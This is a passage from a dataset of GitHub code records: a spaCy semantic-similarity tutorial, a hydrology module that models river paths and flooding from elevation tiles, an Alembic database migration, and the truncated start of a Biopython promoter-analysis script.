"call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 37, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 38, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 41, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}]}
+{"seq_id": "35849913772", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 17:14:46 2019\n\n@author: Josh\n\"\"\"\n\n#Similarity examples (1)\n\nimport spacy\n\nnlp = spacy.load('en_core_web_md')\n\n#Compare two documents\ndoc1 = nlp(\"I like fast food\")\ndoc2 = nlp(\"I like pizza\")\nprint(doc1.similarity(doc2))\n\n#Compare two tokens\ndoc = nlp(\"I like pizza and pasta\")\ntoken1 = doc[2]\ntoken2 = doc[4]\nprint(token1.similarity(token2))\n\n#Similarity examples (2)\n\n#Compare a document with a token\ndoc = nlp(\"I like pizza\")\ntoken = nlp(\"soap\")[0]\n\nprint(doc.similarity(token))\n\n#Compare a span with a document\nspan = nlp(\"I like pizza and pasta\")[2:5]\ndoc = nlp(\"McDonalds sells burgers\")\n\nprint(span.similarity(doc))\n\n#Word vectors in spaCy\n\ndoc = nlp(\"I have a banana\")\n#Access the vector via the token.vector attribute\nprint(doc[3].vector)\n\n#Similarity depends on the application context\n\ndoc1 = nlp(\"I like cats\")\ndoc2 = nlp(\"I hate cats\")\n\nprint(doc1.similarity(doc2))", "repo_name": "joshuagladwin/Advanced-NLP-with-spaCy", "sub_path": "Chapter 2 - Large-scale data analysis with spaCy/8 - Word vector and semantic similarities.py", "file_name": "8 - Word vector and semantic similarities.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "spacy.load", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "1975467335", "text": "import WaterShed\n\nimport pandas as pd\nimport numpy as np\nfrom numpy import unravel_index\nimport pytz\nfrom datetime import datetime\nimport networkx as nx\nfrom tqdm import tqdm\nfrom os import path\nimport os\n\n\n\nclass Graph():\n\n def __init__(self, dem=None, fdir=None, acc=None, compression=1):\n self.dem = dem\n self.fdir = fdir\n self.acc = acc\n self.compression = compression\n self.point_size_meteres = 35\n\n\n def compute_height(self, file_path, DEMs_path, min_acc, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n self.df_new = pd.DataFrame(columns=['hstation_id', 'x_lon', 'y_lat', 'height', 'distance_m', 'error'])\n self.df_new = self.df_new.astype(dtype= {'hstation_id':'int64', 'height':'int64', 'distance_m':'int64', 'error':'int64'})\n x_lon_past, y_lat_past = None, None\n\n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n coordinate = (x_lon, y_lat)\n\n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n # Set acc values as None to calulate them later\n self.acc_slice = None\n self.acc_Graph = None\n \n if lat_num+1 < 60:\n self.point_size_meteres = 35\n self.compression = 2\n else:\n self.point_size_meteres = 65\n self.compression = 1\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=self.compression)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n\n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n height, distance, success = self.compute_height_differance(coordinate, top_left, bottom_right, 10000, min_acc)\n error = 1 if success == False else 0\n\n dct = {\n 'hstation_id': hstation_id, \n 'x_lon': x_lon, \n 'y_lat': y_lat, \n 'height': int(height),\n 'distance_m': int(distance),\n 'error': int(error)\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n else:\n # here is save for 
error hydropost (corner hydropost without all DEMs)\n                dct = {\n                    'hstation_id': hstation_id, \n                    'x_lon': x_lon, \n                    'y_lat': y_lat, \n                    'height': 0,\n                    'distance_m': 0,\n                    'error': 1\n                }\n                self.df_new = self.df_new.append(dct, ignore_index=True)\n                self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n\n\n    def compute_DEM(self, pathes, lng_num, lat_num, compression=3):\n        if len(pathes) == 9:\n            shed = WaterShed.WaterSheds(files_pathes=pathes, compute_acc=True, compression=compression)\n            self.compression = compression\n            self.acc = shed.acc\n            self.dem = shed.dem\n            self.fdir = shed.fdir\n        else:\n            # Use only the central tile\n            lat = str(lat_num)\n            lng = ''.join((['0'] + list(str(int(lng_num))))[-3:])\n            shed = WaterShed.WaterSheds(file_path=f'n{lat}_e{lng}_1arc_v3.tif', compute_acc=True)\n            self.compression = compression\n            self.acc = shed.acc\n            self.dem = shed.dem\n            self.fdir = shed.fdir\n\n\n    def compute_height_differance(self, coordinate, top_left, bottom_right, lenth, min_acc):\n        # Avoid re-creating the acc graph for the same lon & lat\n        if (self.acc_slice is None) or (self.acc_Graph is None):\n            acc_slice = self.acc.copy()\n            # Filter river cells\n            self.create_acc_graph(acc_slice, self.fdir, min_acc)\n\n        point = self.coordinate2point(coordinate, top_left, bottom_right)\n        river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success = self.compute_river_path(point, lenth)\n\n        start, end = river_pathes_nodes_DOWN[-1], river_pathes_nodes_UP[-1]\n        start_height, end_height = self.dem[start], self.dem[end]\n        return abs(start_height - end_height), distance, success\n\n\n    def compute_river_path(self, point, lenth):\n        \"\"\"\n        Function returns all river nodes down and up from the given point.\n        * lenth - in meters from the start, both downstream and upstream.\n        \"\"\"\n        point_lenth = self.compression * self.point_size_meteres # each grid cell is roughly 35 meters across\n\n        # DOWN\n        river_pathes_lenght_DOWN = int(lenth/point_lenth) # number of flooded river cells downstream\n        river_pathes_nodes_DOWN = [point] # The starting point is included as well.\n        node = point\n        for _ in tqdm(range(river_pathes_lenght_DOWN)):\n            try:\n                new_node = self.out_node(node)\n                river_pathes_nodes_DOWN.append(new_node)\n                node = new_node\n            except:\n                print(f\"Out nodes not defined.\nLast node: {river_pathes_nodes_DOWN[-1]}\nCollected {len(river_pathes_nodes_DOWN)} nodes\")\n                break\n\n        # UP\n        river_pathes_lenght_UP = int(lenth/point_lenth) # number of flooded river cells upstream\n        river_pathes_nodes_UP = [point] # The starting point is included as well.\n        node = point\n        for _ in tqdm(range(river_pathes_lenght_UP)):\n            try:\n                new_node = self.in_node(node)\n                river_pathes_nodes_UP.append(new_node)\n                node = new_node\n            except:\n                print(f\"In nodes not defined.\nLast node: {river_pathes_nodes_UP[-1]}\nCollected {len(river_pathes_nodes_UP)} nodes\")\n                break\n\n        distance = (len(river_pathes_nodes_DOWN) + len(river_pathes_nodes_UP)) * point_lenth\n        success = True if (len(river_pathes_nodes_DOWN) == river_pathes_lenght_DOWN + 1) and (len(river_pathes_nodes_UP) > (0.5*river_pathes_lenght_UP)) else False\n        return river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success\n\n\n    def coordinate2point(self, coordinate, top_left, bottom_right):\n        # lng - horizontal, lat - vertical\n        # shape[0] - vertical\n        # shape[1] - horizontal\n        lng, lat = coordinate\n        lng_left, lng_right = top_left[0], bottom_right[0]\n        lat_top, lat_bottom = top_left[1], bottom_right[1]\n        lng = abs(lng_left - lng) / 
abs(lng_left - lng_right)\n lat = 1 - (abs(lat_bottom - lat) / abs(lat_top - lat_bottom))\n\n x_path, y_path = 1/self.dem.shape[1], 1/self.dem.shape[0]\n x_coordinate = int(round(lng/x_path, 0))\n y_coordinate = int(round(lat/y_path, 0))\n\n # Check that coordinate contains right cell\n # There can be error with rounding\n if self.accumulation_for_point((y_coordinate, x_coordinate)) < 1000:\n acc_near = self.acc[\n y_coordinate-4 : y_coordinate+5,\n x_coordinate-4 : x_coordinate+5\n ]\n max_index = unravel_index(acc_near.argmax(), acc_near.shape)\n y_coordinate = y_coordinate + max_index[0]-4\n x_coordinate = x_coordinate + max_index[1]-4\n return (y_coordinate, x_coordinate)\n else:\n return (y_coordinate, x_coordinate)\n\n\n def create_acc_graph(self, acc_slice, dir_slice, min_acc):\n acc_slice[acc_slice < min_acc] = 0\n self.acc_slice = acc_slice # For future nodes matching\n self.acc_Graph = nx.DiGraph()\n for i in range(1, acc_slice.shape[0]-1):\n for j in range(1, acc_slice.shape[1]-1):\n if acc_slice[i, j] != 0:\n dir = dir_slice[i, j]\n dir = dir if dir >= 1 else 1\n start = (i, j)\n target = self.fdir_coordinate(start, dir)\n #print(start, target)\n self.acc_Graph.add_edge(start, target)\n\n\n def fdir_coordinate(self, point, dir):\n (row, column) = point\n if dir == 64: #Up\n return (row - 1, column)\n elif dir == 128: #Up-Right\n return (row - 1, column + 1)\n elif dir == 1: #Right\n return (row, column + 1)\n elif dir == 2: #Down-Right\n return (row + 1, column + 1)\n elif dir == 4: #Down\n return (row + 1, column)\n elif dir == 8: #Down-Left\n return (row + 1, column - 1)\n elif dir == 16: #Left\n return (row, column - 1)\n else: #Up-Left\n return (row - 1, column - 1)\n\n \n def out_node(self, node):\n return [node for node in self.acc_Graph.edges(node)][0][1]\n\n def out_node_G(self, node):\n return [node for node in self.G.edges(node)][0][1]\n\n def in_node(self, node):\n in_nodes = [edge[0] for edge in self.acc_Graph.in_edges(node)]\n nodes_accumulation = [self.acc_slice[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n \n def in_nodes(self, node):\n return [node[0] for node in self.G.in_edges(node)]\n\n\n def accumulation_for_point(self, point):\n return self.acc[point[0], point[1]]\n\n\n\n \n # Flood Part\n\n def compute_flood(self, coordinate, top_left, bottom_right, lenth, target_h, uniform_flooding=False):\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n y, x = point[0], point[1]\n lenth_with_offset = int(lenth/(self.point_size_meteres * self.compression) + 40) # For offset\n flood_area_fdir = self.fdir[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_dem = self.dem[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_acc = self.acc.copy()\n flood_area_acc = flood_area_acc[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n new_x, new_y = lenth_with_offset, lenth_with_offset\n new_point = (new_y, new_x)\n\n # Create temporary acc graph\n self.create_acc_graph(flood_area_acc, flood_area_fdir, 200)\n\n # Get river pathes\n river_pathes_nodes_DOWN, river_pathes_nodes_UP, _, success = self.compute_river_path(new_point, lenth)\n\n # Graph for specified area\n self.G = nx.DiGraph()\n shape = flood_area_fdir.shape\n\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = flood_area_fdir[row, column]\n start = (row, column)\n target = 
self.fdir_coordinate(start, dir)\n self.G.add_edge(start, target)\n\n # Make flood\n if uniform_flooding == False:\n self.h = flood_area_dem[new_y, new_x] + target_h\n\n flooded_nodes_down = []\n all_out_nodes = [] # For both up and down\n for i, node in enumerate(river_pathes_nodes_DOWN[::-1]): # Начинаем с последней затопленной клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_DOWN[0]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n #print(node, in_nodes)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_DOWN).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n\n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_down += all_nodes\n all_out_nodes += out_nodes_log\n\n flooded_nodes_up = []\n for i, node in enumerate(river_pathes_nodes_UP): # Начинаем с первой клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_UP[-1]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_UP).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). 
From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_up += all_nodes\n all_out_nodes += out_nodes_log\n\n self.h = flood_area_dem[new_y, new_x] + target_h\n return flood_area_acc.shape, flooded_nodes_down, flooded_nodes_up, all_out_nodes, flood_area_dem, self.h, point, lenth_with_offset\n\n \n def get_step(self, y_delta, x_delta):\n \"\"\"\n Calculate step for future river slice\n \"\"\"\n if ((y_delta > 3) and (x_delta > 3)) \\\n or ((y_delta < -3) and (x_delta < -3)):\n return (1, 1)\n elif ((y_delta > 3) and (x_delta < -3)) \\\n or ((y_delta < -3) and (x_delta >3)):\n return (1, -1)\n elif x_delta <= 3:\n return (0, 1)\n else:\n return (1, 0)\n\n \n def get_river_slice(self, file_path, DEMs_path, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n # Creat new df to save successes of river slices\n self.df_new = pd.DataFrame(columns=['hstation_id', 'success'])\n \n # For future save\n self.dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n \n x_lon_past, y_lat_past = None, None\n \n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n max_height = int(row[3])\n coordinate = (x_lon, y_lat)\n \n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=1)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n \n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n \n # Coordinates for defining river path\n new_top_left, new_bottom_right = (point[0]-20, point[1]-20), (point[0]+20, point[1]+20)\n cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n # Graph for specified area\n G = nx.DiGraph()\n shape = 
cut_fdir.shape\n\n try:\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = cut_fdir[row, column]\n start = (row, column)\n target = self.fdir_coordinate(start, dir)\n G.add_edge(start, target)\n except:\n dct = {\n 'hstation_id': hstation_id, \n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/river_slice_success_table.csv', sep=';', decimal=',', index=False)\n continue\n\n real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n \n def out_node_G(node):\n return [node for node in G.edges(node)][0][1]\n \n def in_node_G(node):\n in_nodes = [edge[0] for edge in G.in_edges(node)]\n nodes_accumulation = [cut_acc[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n\n outs = [real_coord]\n while len(outs) < 5:\n out = out_node_G(outs[-1])\n outs.append(out)\n\n ins = [real_coord]\n while len(ins) < 5:\n in_ = in_node_G(ins[-1])\n ins.append(in_)\n \n # Clearing instances\n del G, new_top_left, new_bottom_right, cut_fdir, cut_acc, cut_dem\n \n \n # Coordinates for river shape\n# new_top_left, new_bottom_right = (point[0]-550, point[1]-550), (point[0]+550, point[1]+550)\n# cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n start, end = ins[-1], outs[-1]\n y_delta, x_delta = end[0] - start[0], end[1] - start[1]\n\n step = self.get_step(y_delta, x_delta)\n# real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n# target_height = cut_dem[real_coord] + 15\n target_height = self.dem[point] + max_height\n# start = real_coord\n start = point\n\n# right_heights = [self.dem[real_coord]]\n# right_coords = [real_coord]\n right_heights = [self.dem[point]]\n right_coords = [point]\n while (max(right_heights) < target_height) and (len(right_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n right_heights.append(height)\n right_coords.append(start)\n\n# start = real_coord\n start = point\n step = [-i for i in step]\n# left_heights = [cut_dem[real_coord]]\n# left_coords = [real_coord]\n left_heights = [self.dem[point]]\n left_coords = [point]\n while (max(left_heights) < target_height) and (len(left_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n left_heights.append(height)\n left_coords.append(start)\n\n river_slice = left_heights[::-1] + right_heights[1:]\n coords_slice = left_coords[::-1] + right_coords[1:]\n coords_bin_slice = [0 if type(coord) != tuple else 1 for coord in coords_slice]\n\n if os.path.exists(f'{save_path}/{hstation_id}') == False:\n os.makedirs(f'{save_path}/{hstation_id}')\n\n path_to_csv = f'{save_path}/{hstation_id}/{hstation_id}_river_slice.csv'\n final_df = pd.DataFrame({'HEIGHTS': river_slice, 'WaterpostFlag': coords_bin_slice})\n final_df['meteres_path'] = 30 if lat_num+1 <= 60 else 60\n final_df.to_csv(path_to_csv, index=False, sep=';')\n \n dct = {\n 'hstation_id': hstation_id, \n 'max_height': max_height,\n 'success': 1\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', 
decimal=',', index=False)\n \n else:\n # here is save for error hydropost (corner hydropost without all DEMs)\n dct = {\n 'hstation_id': hstation_id,\n 'max_height': max_height,\n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', decimal=',', index=False)\n", "repo_name": "nikitaoltyan/MCHS_WaterSheds", "sub_path": "Graph.py", "file_name": "Graph.py", "file_ext": "py", "file_size_in_byte": 27639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "name"}, {"api_name": "WaterShed.WaterSheds", "line_number": 124, "usage_type": "call"}, {"api_name": "WaterShed.WaterSheds", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 166, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 214, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 225, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 298, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 427, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 435, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 438, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 438, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 467, "usage_type": "call"}, {"api_name": "os.path", "line_number": 467, "usage_type": "name"}, {"api_name": "networkx.DiGraph", "line_number": 498, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path", "line_number": 586, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 587, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}]}
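The `create_acc_graph` / `fdir_coordinate` pair in the Graph.py record above implements classic D8 flow routing: each cell's direction code names its downstream neighbour, and only cells whose flow accumulation clears `min_acc` count as river cells. Below is a minimal, self-contained sketch of that idea, assuming the same D8 convention the file decodes (1=E, 2=SE, 4=S, 8=SW, 16=W, 32=NW, 64=N, 128=NE); the grids are invented toy data, not SRTM tiles.

```python
# Minimal sketch of the D8 river graph built by create_acc_graph(); the
# direction codes and border-skipping loops mirror the file, the grids
# below are invented.
import numpy as np
import networkx as nx

D8_OFFSETS = {
    64: (-1, 0), 128: (-1, 1), 1: (0, 1), 2: (1, 1),
    4: (1, 0), 8: (1, -1), 16: (0, -1), 32: (-1, -1),
}

def build_river_graph(fdir, acc, min_acc):
    """Add one directed edge per river cell, pointing downstream."""
    g = nx.DiGraph()
    rows, cols = fdir.shape
    for i in range(1, rows - 1):        # skip the border, as the file does
        for j in range(1, cols - 1):
            if acc[i, j] < min_acc:
                continue                # below the river threshold
            # unknown codes fall back to NW, like fdir_coordinate's else branch
            di, dj = D8_OFFSETS.get(int(fdir[i, j]), (-1, -1))
            g.add_edge((i, j), (i + di, j + dj))
    return g

fdir = np.full((5, 5), 4)              # toy grid: every cell drains south
acc = np.arange(25).reshape(5, 5)      # toy accumulation values
g = build_river_graph(fdir, acc, min_acc=5)
print(g.number_of_edges())             # 9: every interior cell passes here
```

Tracing a river then reduces to graph walks: follow the single out-edge downstream (as the record's `out_node` does) or pick the in-edge with the largest accumulation upstream (as its `in_node` does).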
+{"seq_id": "19628616589", "text": "\"\"\"add rendered to messages\n\nRevision ID: 7563cb70be2d\nRevises: f33cced0cb75\nCreate Date: 2022-05-14 10:06:18.749900+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlmodel\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"7563cb70be2d\"\ndown_revision = \"f33cced0cb75\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"messages\",\n sa.Column(\n \"rendered\",\n sqlmodel.sql.sqltypes.AutoString(),\n ),\n )\n # ### end Alembic commands ###\n\n # Set the rendered value to the current content and then make it non-null\n op.execute(\"UPDATE messages SET rendered = content\")\n op.alter_column(\"messages\", \"rendered\", nullable=False)\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"messages\", \"rendered\")\n # ### end Alembic commands ###\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "common/database/migrations/versions/7563cb70be2d_add_rendered_to_messages.py", "file_name": "7563cb70be2d_add_rendered_to_messages.py", "file_ext": "py", "file_size_in_byte": 953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlmodel.sql.sqltypes.AutoString", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlmodel.sql", "line_number": 25, "usage_type": "attribute"}, {"api_name": "alembic.op.execute", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "32899997897", "text": "import Bio.pairwise2 as pairwise2\nfrom Bio.pairwise2 import format_alignment\nimport Bio.motifs as motifs\nimport csv\nimport time\nimport re\n\nclass SubUnit_Object(object): \n def __init__(self, Cell_ID, Pathway, Reaction, Enzyme, SubUnit, Promoter_Sequence, Hash):\n self.Cell_Line = Cell_ID #The cell line this enzyme is found at. \n self.Pathway_ID = Pathway #Identity of the pathway this subunit serves.\n self.Reaction_ID = Reaction #Identity of the reaction this subunit serves.\n self.Enzyme_ID = Enzyme #Identity of the enzyme that contains this subunit. \n self.SubUnit_ID = SubUnit #ID of this subunit.\n self.Sequence = Promoter_Sequence #Promoter sequence of this subunit.\n self.Putative_Site = [] #Putative sites that has an impact on this subunit. In form of a list of dictionaries.\n self.Hash = Hash\n\n def read_site(self, Site_ID, Site_Location, Site_Sequence, Site_RC):\n #Takes input from file to create a list of dictionaries. \n self.Putative_Site.append({\"Site_ID\": Site_ID, \"Start_Location\": int(Site_Location),\n \"End_Location\": int(Site_Location) + len(Site_Sequence),\n \"Site_Sequence\": Site_Sequence, 